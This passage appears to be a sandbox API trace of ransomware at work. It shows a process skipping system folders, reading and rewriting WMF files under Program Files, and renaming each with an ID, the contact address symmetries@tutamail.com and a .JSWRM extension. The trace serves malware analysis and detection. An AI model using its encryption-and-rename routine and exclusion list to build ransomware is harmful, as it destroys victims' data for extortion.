[0086.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.970] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.971] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1258, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187881.WMF", cAlternateFileName="")) returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2=".") returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="..") returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="...") returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="windows") returned -1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="recovery") returned -1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="perflogs") returned -1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="documents and settings") returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="system volume information") returned -1 [0086.971] lstrcmpiW (lpString1="J0187881.WMF", lpString2="msocache") returned -1 [0086.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0086.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187881.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187881.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187881.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0086.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0086.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187881.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187881.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187881.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0086.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.972] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4696) returned 1 [0086.972] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1250) returned 0x205850 [0086.972] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1250, lpOverlapped=0x0) returned 1 [0086.974] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.974] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1250, lpOverlapped=0x0) returned 1 [0086.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.974] CloseHandle (hObject=0x314) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0086.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0086.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0086.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.975] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.976] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x834, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187883.WMF", cAlternateFileName="")) returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2=".") returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="..") returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="...") returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="windows") returned -1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="recovery") returned -1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="perflogs") returned -1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="documents and settings") returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="system volume information") returned -1 [0086.976] lstrcmpiW (lpString1="J0187883.WMF", lpString2="msocache") returned -1 [0086.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187883.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187883.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187883.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187883.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187883.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187883.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.977] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2100) returned 1 [0086.977] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x830) returned 0x20c6c0 [0086.977] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0086.979] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.979] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0086.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0086.979] CloseHandle (hObject=0x314) returned 1 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0086.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0086.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0086.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.979] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0086.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.980] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187893.WMF", cAlternateFileName="")) returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2=".") returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="..") returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="...") returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="windows") returned -1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="recovery") returned -1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="perflogs") returned -1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="documents and settings") returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="system volume information") returned -1 [0086.980] lstrcmpiW (lpString1="J0187893.WMF", lpString2="msocache") returned -1 [0086.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187893.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187893.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187893.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187893.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187893.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187893.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.982] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5620) returned 1 [0086.982] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15f0) returned 0x205850 [0086.982] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15f0, lpOverlapped=0x0) returned 1 [0086.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.984] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15f0, lpOverlapped=0x0) returned 1 [0086.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.984] CloseHandle (hObject=0x314) returned 1 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0086.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0086.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.984] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.985] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187895.WMF", cAlternateFileName="")) returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2=".") returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="..") returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="...") returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="windows") returned -1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="recovery") returned -1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="perflogs") returned -1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="documents and settings") returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="system volume information") returned -1 [0086.985] lstrcmpiW (lpString1="J0187895.WMF", lpString2="msocache") returned 